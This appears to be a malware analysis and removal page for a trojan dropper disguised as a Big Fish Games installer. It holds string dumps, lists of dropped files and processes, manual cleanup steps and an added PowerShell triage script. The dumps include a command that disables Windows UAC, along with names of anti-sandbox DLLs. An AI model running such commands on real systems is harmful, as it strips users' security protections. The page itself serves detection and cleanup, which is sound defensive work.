"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /D=%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack
/STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
gsetup_s1_l1.exe
ALS~1\Temp\nsxA.tmp\System.dll
Thawte Certification1
http://ocsp.thawte.com0
.http://crl.thawte.com/ThawteTimestampingCA.crl0
http://ts-ocsp.ws.symantec.com07
 http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at https://www.verisign.com/rpa (c)101.0,
/http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
https://www.verisign.com/rpa0
http://ocsp.verisign.com0;
/http://csc3-2010-aia.verisign.com/CSC3-2010.cer0
https://www.verisign.com/cps0*
#http://logo.verisign.com/vslogo.gif04
#http://crl.verisign.com/pca3-g5.crl04
http://ocsp.verisign.com0
Nullsoft Install System v2.46-Unicode
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsxA.tmp
nsxA.tmp
TH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
%Documents and Settings%\All Users\Application Data\BigFishCache
d Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
bfgsetup_s1_l1.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr9.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v06-Dec-2010.cvs
3.3.0.2
04090000
04070000

bfgsetup_s1_l1.exe_552:

.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
u: %d/%d trang...Kh
m.&Back&Forward&ReloadReload no cache&Stop&Undo&RedoCu&t&Copy&Paste&DeleteSelect &all&Find...&Print...View Source...
%dHTML
&Back&Forward&ReloadReload no cache&Stop&Undo&RedoCu&t&Copy&Paste&DeleteSelect &all&Find...&Print...View Source...
.reloc
AccessControl.dll
ClearOnRegKey
DenyOnRegKey
DisableRegKeyInheritance
EnableRegKeyInheritance
GetRegKeyGroup
GetRegKeyOwner
GrantOnRegKey
RevokeOnRegKey
SetOnRegKey
SetRegKeyGroup
SetRegKeyOwner
.text1
.adata
.data1
.pdata
Nullsoft Install System v2.46-Unicode
verifying installer: %d%%
unpacking data: %d%%
... %d%%
http://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
ent.exe
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscD.tmp\System.dll
ol.dll
og\gamemanager_install_log.txt
scD.tmp
OCALS~1\Temp\nscD.tmp\System.dll
er.bmp
EnumerateSubKeys
CreateSubKey
GenericExecute
Cannot apply new access control list. Error code: %d
Cannot build new access control list. Error code: %d
Cannot read access control list. Error code: %d
Bad permission flags (%s)
Bad trustee (%s)
Cannot change access control list inheritance. Error code: %d
Cannot apply new ownership. Error code: %d
Cannot open process token. Error code: %d
Bug: Unsupported change mode: %d
Cannot look up owner. Error code: %d
Cannot get current ownership. Error code: %d
Root key name missing
Registry key name missing
Bad root key name (%s)
Couldn't lookup current user name. Error code %d:
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscD.tmp
nscD.tmp
\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
d Settings\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe
%Documents and Settings%\All Users\Application Data\BigFishCache
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack
%Program Files%\bfgclient
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller
bfgsetup_s1_l1.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsxB.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe
1510605463
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
3.3.0.2
04090000

Ptype.exe_1144_rwx_13140000_00011000:

.idata
.rdata
P.reloc
P.rsrc
BuildImportTable: can't load library:
BuildImportTable: ReallocMemory failed
BuildImportTable: GetProcAddress failed
BTMemoryLoadLibary: BuildImportTable failed
BTMemoryGetProcAddress: no export table found
BTMemoryGetProcAddress: DLL doesn't export anything
BTMemoryGetProcAddress: exported symbol not found
kernel32.dll
76487-644-3177037-23510
55274-640-2673064-23950
sbiedll.dll
dbghelp.dll
RLHOOK32.DLL
snxhk.dll
Software\Microsoft\Windows\CurrentVersion
ntdll.dll
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
%sysdir%\
%sysdir%
~a39.log
cmd_.bat
sevane.tmp
user32.dll
cmd.dll
~a21524.log
GetProcessHeap
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
WinExec
GetWindowsDirectoryA
wsock32.dll
shell32.dll
ShellExecuteA
7'7 7/73777;7?7!8<8
KWindows
66006666


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager). The numbers after the colon are process IDs from the analysis run on Windows XP SP3 and will differ on an infected system, so match on the image name rather than the PID:

    3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060
    WScript.exe:368
    CrashHandler.exe:420
    CrashHandler.exe:680
    HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648
    bfgsetup_s1_l1.exe:1796
    %original file name%.exe:1236
    reg.exe:1164
    reg.exe:620
    reg.exe:232
    reg.exe:204
    reg.exe:1832
    reg.exe:508
    reg.exe:1352
    reg.exe:1292
    reg.exe:280
    reg.exe:308
    reg.exe:1176
    reg.exe:996
    reg.exe:468
    reg.exe:208
    reg.exe:1356
    reg.exe:1496
    reg.exe:964
    reg.exe:904
    reg.exe:968
    reg.exe:2024
    reg.exe:644
    reg.exe:1100
    reg.exe:544
    reg.exe:1764

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Ptype.exe (3312 bytes)
    %Documents and Settings%\%current user%\CrashHandler.exe (81017 bytes)
    %Documents and Settings%\%current user%\Application DataFilename.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (1960 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (589 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (2341 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (3821 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (706 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (2342 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (731 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (16699 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (4448 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (6386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (1137 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (1098 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UserInfo.dll (3 bytes)
    %Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe (5731 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (429 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~a21524.log (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\UserInfo.dll (3 bytes)
    %Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe (1120371 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\System.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_en.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_fr.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_es.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_sw.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_de.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_de.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_pt.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_dn.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_it.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_it.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_fr.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_pt.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_en.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_jp.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_es.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\AccessControl.dll (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_dn.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_jp.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_du.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_du.ini (3 bytes)
    %Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamemanager_install_log.txt (426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\uac.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsxC.tmp (1178954 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\modern-header.bmp (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_sw.ini (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE (237 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\NSISdl.dll (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S1YHUDA9\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\uac.dll (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\inetc.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IJE9GDOV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5KLKDKJ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\nsProcess.dll (4206 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (36 bytes)
    %Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe (2998318 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IRCX4XCX\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\System.dll (11 bytes)
    %Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamestub_t_install_log.txt (37602 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (318 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\throttle.txt (2 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
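The six manual steps above, collected into one triage script. This is an added example and not the report's or Lavasoft's own code. It assumes things the page does not state: Windows PowerShell 2.0 or later, an elevated prompt, and that the WScript.exe process in the list was running the dropped aihgmsvmb.vbs. The -Remove switch belongs to this script only; without it nothing is changed. The report's placeholders (%Documents and Settings%, %current user%) are resolved from environment variables, and the path "Application DataFilename.exe" is reproduced exactly as the report spells it, with no separator, because the report lists it that way in both the file list and the Run value.

```powershell
# Added triage script for the indicators in the report above. It is not the report's or
# Lavasoft's code. Assumptions not stated on the page: Windows PowerShell 2.0 or later, an
# elevated prompt, and that the WScript.exe instance was running the dropped aihgmsvmb.vbs.
# -Remove is this script's own switch; without it the script only reports.
param([switch]$Remove)

# Resolve the report's placeholders. The analysis ran on XP SP3, where the profile root is
# "C:\Documents and Settings\<user>" and the LOCALAPPDATA / ProgramData variables do not exist;
# on Vista and later the same folders live under C:\Users\<user>\AppData and C:\ProgramData.
$userRoot  = $env:USERPROFILE
$localData = if ($env:LOCALAPPDATA) { $env:LOCALAPPDATA } else { Join-Path $userRoot 'Local Settings\Application Data' }
$allUsers  = if ($env:ProgramData)  { $env:ProgramData }  else { Join-Path $env:ALLUSERSPROFILE 'Application Data' }
$temp      = $env:TEMP
$findings  = @()

# 1. Processes. The PIDs in the report belong to the sandbox run and mean nothing here, so match
#    on image name. reg.exe and WScript.exe are Windows binaries; only the WScript.exe instance
#    running the dropped VBS is targeted (assumption), and the reg.exe calls are transient.
$procPatterns = 'Ptype.exe', 'CrashHandler.exe', 'bfgsetup_s1_l1.exe',
                '3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ.*', 'HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W.*'
foreach ($p in Get-WmiObject Win32_Process) {
    $hit = $false
    foreach ($pat in $procPatterns) { if ($p.Name -like $pat) { $hit = $true } }
    if ($p.Name -eq 'wscript.exe' -and $p.CommandLine -like '*aihgmsvmb.vbs*') { $hit = $true }
    if ($hit) {
        $findings += "process $($p.Name) pid $($p.ProcessId): $($p.CommandLine)"
        if ($Remove) { [void]$p.Terminate() }
    }
}

# 2. Dropped files, as the report lists them. "Application DataFilename.exe" is kept exactly as
#    spelled there: a file in the profile root, not something inside Application Data.
$files = @(
    (Join-Path $userRoot  'Ptype.exe'),
    (Join-Path $userRoot  'CrashHandler.exe'),
    (Join-Path $userRoot  'Application DataFilename.exe'),
    (Join-Path $localData 'aihgmsvmb.vbs'),
    (Join-Path $temp      '3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE'),
    (Join-Path $temp      'HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE'),
    (Join-Path $allUsers  'BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe'),
    (Join-Path $allUsers  'BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe'),
    (Join-Path $allUsers  'BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe')
)
foreach ($f in $files) {
    if (Test-Path -LiteralPath $f) {
        $findings += "file $f"
        if ($Remove) { Remove-Item -LiteralPath $f -Force }
    }
}
# The ns??.tmp and _MEI<n> entries under Temp are the NSIS and PyInstaller unpack areas
# (python27.dll plus *.pyd under _MEI4202 is PyInstaller's one-file layout); their names change
# on every run, so they are matched by pattern rather than by the names in the report.
foreach ($e in @(Get-ChildItem -Path $temp -Force -ErrorAction SilentlyContinue |
                 Where-Object { $_.Name -like 'ns??.tmp' -or $_.Name -like '_MEI*' })) {
    $findings += "temp $($e.FullName)"
    if ($Remove) { Remove-Item -LiteralPath $e.FullName -Recurse -Force -ErrorAction SilentlyContinue }
}

# 3. Persistence: the Run value named in step 4 of the manual removal.
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$run = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
if ($run -and $run.PSObject.Properties['Handler']) {
    $findings += "autorun $runKey\Handler = $($run.Handler)"
    if ($Remove) { Remove-ItemProperty -Path $runKey -Name 'Handler' }
}

# 4. UAC. The Ptype.exe dump carries "reg.exe ADD HKLM\...\Policies\System /v EnableLUA
#    /t REG_DWORD /d 0 /f". XP SP3, the analysis platform, has no UAC, so the value only matters
#    on Vista and later, where EnableLUA=0 switches UAC off at the next reboot.
$polKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$pol = Get-ItemProperty -Path $polKey -ErrorAction SilentlyContinue
if ($pol -and $pol.PSObject.Properties['EnableLUA'] -and $pol.EnableLUA -eq 0) {
    $findings += "EnableLUA = 0 under $polKey"
    if ($Remove) { Set-ItemProperty -Path $polKey -Name 'EnableLUA' -Value 1 -Type DWord }
}

$state = if ($Remove) { 'removed' } else { 'found' }
if ($findings.Count -eq 0) { 'No indicators from the report were found.' }
else { $findings | ForEach-Object { "[$state] $_" } }
```

Run it once without -Remove and read the report, then again with -Remove from an elevated prompt; step 5 (Temporary Internet Files) and the reboot in step 6 are left to the operator. Two caveats from the report itself: the BigFishCache files and %Program Files%\bfgclient are the Big Fish Games client installer that the dropper writes (the page also records a bigfishgames cookie), so on a machine that legitimately had that client installed, deleting them removes the client too; and the EnableLUA check is included because the dump string and the many reg.exe children show the intent, even though the XP SP3 run could not have been affected by it.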
